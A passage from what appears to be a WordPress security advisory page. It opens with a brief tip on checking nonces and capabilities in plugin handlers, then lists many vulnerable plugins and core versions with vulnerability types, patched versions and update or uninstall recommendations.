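                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
} );
```

When reviewing a plugin for this class, list every `add_action( 'wp_ajax_...' )`, `admin_post_...` and `register_rest_route()` call and confirm each handler checks both a nonce (or, for REST with cookie auth, relies on core's X-WP-Nonce check) and a capability appropriate to what it writes. A nonce alone is not authorization: every logged-in user can obtain one.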

Plugin: Global Flash Gallery

Vulnerability: SQL Injection
Patched Version: 0.15.2
Recommended Action: Update to version 0.15.2, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Missing Authorization Checks
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Authentication Bypass
Patched Version: 7.6.5
Recommended Action: Update to version 7.6.5, or a newer patched version

Plugin: Ninja Forms – File Uploads

Vulnerability: Not specified in this entry (affects versions <= 3.0.22)
Patched Version: 3.0.23
Recommended Action: Update to version 3.0.23, or a newer patched version

Plugin: WP Mail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Hide Login Page Feature Protection Bypass
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: WP Simple Adsense Insertion

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Coditor – Code Editor

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Booking Price Manipulation via bookingpress_confirm_booking
Patched Version: 1.0.75
Recommended Action: Update to version 1.0.75, or a newer patched version

Plugin: White Label CMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Core: WordPress MU

Vulnerability: Username Enumeration
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Clockwork SMS Notfications

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image horizontal reel scroll slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 13.3
Recommended Action: Update to version 13.3, or a newer patched version

Plugin: Login for Google Apps

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Missing Authorization to Arbitrary Options Update
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Plugin: Optimize Database after Deleting Revisions

Vulnerability: Missing Authorization via ‘odb_csv_download’
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Easy Digital Downloads – htaccess Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Autoptimize

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: WP Marketplace – Complete Shopping Cart / eCommerce Solution

Vulnerability: Arbitrary File Download
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: WPMobile.App — Android and iOS Mobile Application

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 11.14
Recommended Action: Update to version 11.14, or a newer patched version

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Team Members

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘rawdata’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: eShop

Vulnerability: Cross-Site Scripting
Patched Version: 6.3.12
Recommended Action: Update to version 6.3.12, or a newer patched version

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 2.15.0
Recommended Action: Update to version 2.15.0, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.8.4.3
Recommended Action: Update to version 1.8.4.3, or a newer patched version

Plugin: f(x) TOC

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Pipes

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Survey Maker

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Product Catalog Feed by PixelYourSite

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: 3DPrint

Vulnerability: Cross-Site Request Forgery to Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: License Manager for WooCommerce

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.11
Recommended Action: Update to version 2.2.11, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.77.32
Recommended Action: Update to version 1.0.77.32, or a newer patched version

Plugin: WordPress Slider Block Gutenslider

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Any Hostname

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina)

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_clear_cache_of_allsites_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Live Composer – Free WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.24
Recommended Action: Update to version 1.5.24, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Login Lockdown & Protection

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.07
Recommended Action: Update to version 2.07, or a newer patched version

Plugin: Ebook Store

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.78
Recommended Action: Update to version 5.78, or a newer patched version

Plugin: cformsII

Vulnerability: Unauthenticated stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: nextgen-smooth-gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting via MediaElement.js
Patched Version: 3.7.14
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.14, 3.8.14, 3.9.12, 4.0.11, 4.1.11, 4.2.8, 4.3.4, 4.4.3, 4.5.2

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.59
Recommended Action: Update to version 1.6.59, or a newer patched version

Plugin: MainWP Maintenance Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: Chilexpress woo oficial

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Collapse-O-Matic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Simple Share Buttons Adder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.25.6
Recommended Action: Update to version 1.25.6, or a newer patched version

Plugin: WordPress Tables

Vulnerability: Reflected Cross-Site Scripting via error_msg
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSSImport

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login and Logout Redirect

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analytics for Woo – Putler Accurate Analytics and Reports for your WooCommerce Store

Vulnerability: Missing Authorization via ‘putler_connector_sync_complete’
Patched Version: 2.13.0
Recommended Action: Update to version 2.13.0, or a newer patched version

Plugin: ActiveCampaign for WooCommerce

Vulnerability: Missing Authorization to Error Log Deletion
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: PHP Object Injection
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Back In Stock Notifier for WooCommerce | Manage Inventory and Waitlist Product for WooCommerce

Vulnerability: Missing Authorization via API
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Complete Gallery Manager for WordPress | Galleries

Vulnerability: Arbitrary File Upload
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: WP-FlyBox

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.13.45
Recommended Action: Update to version 7.13.45, or a newer patched version

Plugin: WP Report Post

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Toolset Types – Custom Post Types, Custom Fields and Taxonomies

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 3.4.18
Recommended Action: Update to version 3.4.18, or a newer patched version

Plugin: Featured Image from URL (FIFU)

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.10
Recommended Action: Update to version 2.8.10, or a newer patched version

Plugin: Relevant – Related, Featured, Latest, and Popular Posts by BestWebSoft

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Authors List

Vulnerability: Reflected Cross-Site Scripting via al_id
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: article2pdf

Vulnerability: Denial of Service
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 123.chat – 1:1 Live Video Chat Tool Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Not specified in this entry (affects versions <= 3.1.1)
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Core: WordPress

Vulnerability: Authentication Bypass
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Gwyn’s Imagemap Selector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress prettyPhoto

Vulnerability: DOM Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WP Rollback – Rollback Plugins and Themes

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: Missing Authorization on REST Route
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Portfolio Gallery – Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: FlagEm

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wordpress plugin rockhoist-badges

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Sensitive Information Exposure via Diff Response
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Display Data on your site! Create Dynamic Content Templates from any form of data. Works with ACF, Pods, BuddyPress/ BuddyBoss

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: HDW Player Plugin (Video Player & Video Gallery)

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Automatic YouTube Gallery

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Request Forgery via admin_galleries
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: a3 Portfolio

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Contact Forms – Drag & Drop Contact Form Builder

Vulnerability: Not specified in this entry (affects versions <= 1.0.5)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Tape

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pay With Tweet

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Countdown Block

Vulnerability: Missing Authorization
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: Corner Ad

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.57
Recommended Action: Update to version 1.0.57, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.16
Recommended Action: Update to version 3.2.16, or a newer patched version

Plugin: Store Toolkit – WooCommerce Extensions, Quick Enhancements & Handy Tools

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Access Code Feeder

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AI Engine

Vulnerability: Authenticated (Editor+) Arbitrary File Upload via add_image_from_url
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: SQL Injection
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Activation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: CF7 Invisible reCAPTCHA

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Mega Menu Plugin for WordPress – AP Mega Menu

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: a3 Responsive Slider

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: wp-media-player

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spot.IM Comments

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: WP JS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin and Site Enhancements (ASE)

Vulnerability: Password Protection Mode Security Feature Bypass
Patched Version: 5.8.0
Recommended Action: Update to version 5.8.0, or a newer patched version

Plugin: Post Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.31
Recommended Action: Update to version 1.1.31, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Advanced Product Labels for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.3.7
Recommended Action: Update to version 1.2.3.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authorization Bypass to Arbitrary File Upload/Delete
Patched Version: 1.0.84
Recommended Action: Update to version 1.0.84, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery via delete
Patched Version: 6.2.0.0
Recommended Action: Update to version 6.2.0.0, or a newer patched version

Plugin: EmbedSocial – Social Media Feeds, Reviews and Galleries

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.28
Recommended Action: Update to version 1.1.28, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: article2pdf

Vulnerability: Not specified in this entry (affects version 0.27)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thinkun Remind

Vulnerability: Directory Traversal
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Sharebar

Vulnerability: Cross-Site Request Forgery to Settings Update & Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ibtana – WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2.1
Recommended Action: Update to version 1.2.2.1, or a newer patched version

Plugin: Code Snippets

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 2.14.0
Recommended Action: Update to version 2.14.0, or a newer patched version

Plugin: Magn WP Drag And Drop Media Uploader

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Structured Content (JSON-LD) #wpsc

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Quiz Maker

Vulnerability: SQL Injection
Patched Version: 6.2.0.9
Recommended Action: Update to version 6.2.0.9, or a newer patched version

Plugin: Advanced Local Pickup for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Super Popup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Continuous Image Carousel With Lightbox

Vulnerability: Reflected Cross-Site Scripting via search_term, order_by and order_pos
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: jQuery T(-) Countdown Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.24
Recommended Action: Update to version 2.3.24, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Directory Traversal to Information Exposure
Patched Version: 1.0.26
Recommended Action: Update to version 1.0.26, or a newer patched version

Plugin: Xerte Online

Vulnerability: Arbitrary File Upload
Patched Version: 0.36
Recommended Action: Update to version 0.36, or a newer patched version

Plugin: WP Zoho for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms – CRM, Bigin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: File Gallery

Vulnerability: Reflected Cross-Site Scripting via post_id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Secure Copy Content Protection and Content Locking

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Blue Wrench Video Widget

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: GD Mail Queue

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Quick Page/Post Redirect Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Geo Mashup

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Up down image slideshow gallery

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: BSK PDF Manager

Vulnerability: Authenticated SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WPGateway

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.3.25
Recommended Action: Update to version 4.3.25, or a newer patched version

Plugin: Guest Author

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Add Shortcodes Actions And Filters

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LiveChat – WP live chat plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.16
Recommended Action: Update to version 4.5.16, or a newer patched version

Plugin: Easy Modal

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Cross-Site Scripting
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.5
Recommended Action: Update to version 8.5, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Ban Bypass
Patched Version: 2.26.5
Recommended Action: Update to version 2.26.5, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Multiple Cross-Site Request Forgery vulnerabilities
Patched Version: 3.9.9
Recommended Action: Update to version 3.9.9, or a newer patched version

Plugin: flickrRSS

Vulnerability: Cross-Site Scripting via flickrRSS_id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Eventify™ – Simple Events

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ajax-random-post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Title Field Validation

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

